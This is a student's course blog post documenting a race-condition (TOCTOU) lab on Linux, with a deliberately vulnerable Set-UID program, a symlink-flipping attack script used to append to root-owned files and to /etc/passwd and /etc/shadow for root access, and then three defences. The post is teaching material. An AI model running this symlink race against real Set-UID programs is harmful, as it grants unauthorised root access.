2019-2020-1 20199311《Linux内核原理与分析》第十一周作业

1.问题描述

通过这一周的实习,主要学习了竞态条件漏洞的运行机理,同时进行了使用竞态条件漏洞重写root权限文件以及获得root权限两个实验,最后讨论了预防竞态条件漏洞的几个措施。

2.解决过程

2.1 理论知识

下面这个代码段属于某个特权程序(Set-UID 程序),它使用 Root 权限运行。

if (!access("/tmp/X", W_OK))
{
    f = open("/tmp/X", O_WRITE);
    write_to_file(f);
}
else
{
    fprintf(stderr, "Permission denied\n");
}

access系统该调用检查了真实 UID 或者 GID 是否拥有访问文件的权限,有的话返回 0。在代表真实 UID (而不是有效 UID)访问文件之前,该系统调用通常由 Set-UID 程序使用。open系统调用也执行访问控制,但是仅仅检查有效 UID 或 GID 是否拥有访问文件的权限。上面的程序想要写入文件/tmp/X。在这么做之前,它要确保,文件确实由真实 UID 写入。如果没有这种检查,程序可以写入这个文件,无论真实 UID 可不可以写入它,因为程序使用 Root 权限运行(即open所检查的有效 UID 是 Root)。
攻击策略如下:如果我们让/tmp/X在第一行之前打印/etc/passwd,access调用就会发现,真实 UID 没有权限来修改/etc/passwd。因此,执行流会来到else分支。在第一行之前,/tmp/X必须是一个能被真实 UID 写入的文件。显然,如果我们在第一行之后不做任何事情,/tmp/X会打开,我们不能获得任何东西。但如果我们在第一行和第三行代码中间间隔删掉/tmp/X并且使用相同名称创建符号链接,并使其指向/etc/passwd。
通过遵循符号链接,程序使用open来打开/etc/passwd。open系统调用只检查有效 UID 或 GID 是否可以访问文件。由于这是个 Set-UID Root 程序,有效 UID 是 Root,它可以读写/etc/passwd。因此,第四行实际上会写入文件/etc/passwd。这样我们可以修改密码文件,最终获得root权限。
但两行代码之间仅仅有很短的时间间隔,我们要设法利用这个时间间隔。CPU 可能在access后进行上下文切换,之后执行其它进程。如果攻击进程在上下文切换之间,得到了机会来执行这种攻击,攻击就会成功。因为我们不能保证,第一行和第三行之间存在上下文切换,即使攻击程序在上下文切换期间,得到执行机会,攻击也可能失败。但是,如果执行一次不成功,我们可以多次执行攻击和目标程序。
因此,竞态条件攻击的最关键步骤,出现在 时间 间隔中。由于我们不能修改漏洞程序,我们可以做的只有让我们的攻击程序和目标程序一起运行。并希望链接的时机正好就在间隔之内。达到这种目的可以编写一个查看文件时间戳的脚本。

2.2 实验

2.2.1 实验准备

本次实验环境为实验楼环境,由于本实验环境开启了针对竞态条件攻击的保护,所以需要先关掉保护。该选项意味着全域可写sticky位开启的文件夹是不能作为链接目标所在文件夹的。命令如下

$ sudo su
$ echo 0 > /proc/sys/fs/protected_symlinks
$ exit

创建工作目录

$ cd ~
$ mkdir seed

在/home/shiyanlou/seed目录下创建vulp.c文件,输入漏洞程序的源代码

$ cd /home/shiyanlou/seed
$ sudo vi vulp.c

/* vulp.c */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        for(i=0; i < DELAY; i++){
            int a = i^2;
        }
        fp = fopen(fn, "a+");
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");
}

这个程序与上节所示的程序拥有相同的漏洞。由于检查(access)与访问(fopen)之间存在时间间隙,所以检查与访问的就有可能不是同一个文件,即使它们的名字相同。如果一个恶意攻击者可以创建一个 /tmp/XYZ/ 链接指向 /etc/shadow,输入的字符串就会追加到shadow文件中去。
图片描述

2.2.2 使用竞态条件漏洞重写root权限文件

1. 实验所需文件

创建几个实验所需文件

-rw-rw-r-- 1 shiyanlou shiyanlou    9 Nov 28 10:32 append_text  《--VULP输入文件
-rw-rw-r-- 1 root      root         0 Nov 28 10:30 root_file  《--目标文件
-rw-rw-r-- 1 shiyanlou shiyanlou    0 Nov 28 10:32 tmp_file  《--助攻
文件
-rwsr-xr-x 1 root      root      7403 Nov 28 10:18 vulp  《--漏洞文件
-rw-r--r-- 1 root      root       389 Nov 28 10:29 vulp.c

首先编译vulp.c并将其设为SET-UID文件

$ sudo gcc vulp.c -o vulp
$ sudo chmod u+s vulp

新建 root_file 文件,这是我们的目标文件

$ sudo touch root_file 
$ sudo chmod g+w root_file

新建append_text 文件以及tmp_file文件,在append_text文件中加入20199311

$ vim append_text
$ touch tmp_file

图片描述
图片描述

2. 进行攻击

以下操作均使用用户权限
创建检查时间戳的脚本check.sh,并将运行vulp的命令加入其中。并赋予它可运行权限

old=`ls -l /home/shiyanlou/seed/root_file`
new=`ls -l /home/shiyanlou/seed/root_file`
while [ "$old" = "$new" ]
do
    ./vulp < append_text
    new=`ls -l /home/shiyanlou/seed/root_file`
done
echo "STOP... The file has been changed"

$ chmod u+x check.sh

图片描述
图片描述
创建攻击代码attacker.c并编译

int main()
{
    while(1){
        system("ln -sf /home/shiyanlou/seed/tmp_file /tmp/XYZ");
        system("ln -sf /home/shiyanlou/seed/root_file /tmp/XYZ");
    }
    return 0;
}

图片描述
图片描述
此时文件夹目录的情况
图片描述
新建标签页,先运行 attacker 再运行check.sh
图片描述
可以看到内容已经被写进root_file中了
图片描述

2.2.2 使用竞态条件漏洞获取root权限

攻击步骤与上个实验基本相同,但要注意这时修改的文件变为了/etc/passwd和/etc/shadow。
先回顾下passwd文件与shadow文件中的格式

/etc/passwd:
-------------
smith:x:1000:1000:Joe Smith,,,:/home/smith:/bin/bash
/etc/shadow:
-------------
smith:*1*Srdssdsdi*M4sdabPasdsdsdasdsdasdY/:13450:0:99999:7:::

假设用户账户名:clover 密码:revolc
生成shadow密码

$ mkpasswd -m sha-512 revolc

图片描述
创建append_1_text和check.sh,append_2_text和check1.sh。两组文件分别通过漏洞向/etc/passwd和/etc/shadow文件写入内容
append_1_text内容如下
图片描述
append_2_text内容如下
图片描述
check.sh内容如下
图片描述
check1.sh内容如下
图片描述
操作如下
图片描述
修改/etc/passwd内容步骤,修改attacker.c函数
图片描述
图片描述
执行./attacker与./check.sh
图片描述
同理,修改/etc/shadow内容
使用root权限查看这两个文件,发现攻击成功,用户clover获得root权限
图片描述
/etc/passwd
图片描述
/etc/shadow
图片描述

2.3 预防机制

2.3.1 预防机制A:重复

我们可以增加更多的竞态条件,这样就能减小攻击者攻击成功的概率了。该机制的基础思想是重复access和fopen函数的次数。

#include <stdio.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        if(!access(fn, W_OK)){
            /*嵌套n层*/
            fp = fopen(fn, "a+");
            fwrite("\n", sizeof(char), 1, fp);
            fwrite(buffer, sizeof(char), strlen(buffer), fp);
            fclose(fp);
        }
        else printf("No permission \n");
    }
    else printf("No permission \n");
}

2.3.2 保护机制B:最小权限原则

该程序的根本问题就在于它违反了最小权限原则,程序员认识到运行这个程序的用户可能权利过大,所以引入access函数进行限制,但也同时引入了竞态条件的隐患。
更好的方法是使用setuid系统调用暂时禁止root权限,当需要时再恢复。

#include <stdio.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );

    uid_t euid = geteuid(); 
    seteuid(getuid());

    for (i=0; i < DELAY; i++){
            int a = i^2;
    }

    if (fp = fopen(fn, "a+")){
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");

    seteuid(euid);
}

2.3.4 预防机制C:Ubuntu内置方案

实验一开始我们关闭的那个选项。这个选项意味着全域可写sticky位开启的文件夹是不能作为链接目标所在文件夹的。所以攻击函数attacker.c也就不能成功运行了。

3.总结

通过这一周学习,我初步了解了竞态条件漏洞的运行机理以及预防方案。

posted @ 2019-11-28 15:08  buguoliujibugaiming  阅读(218)  评论(0编辑  收藏  举报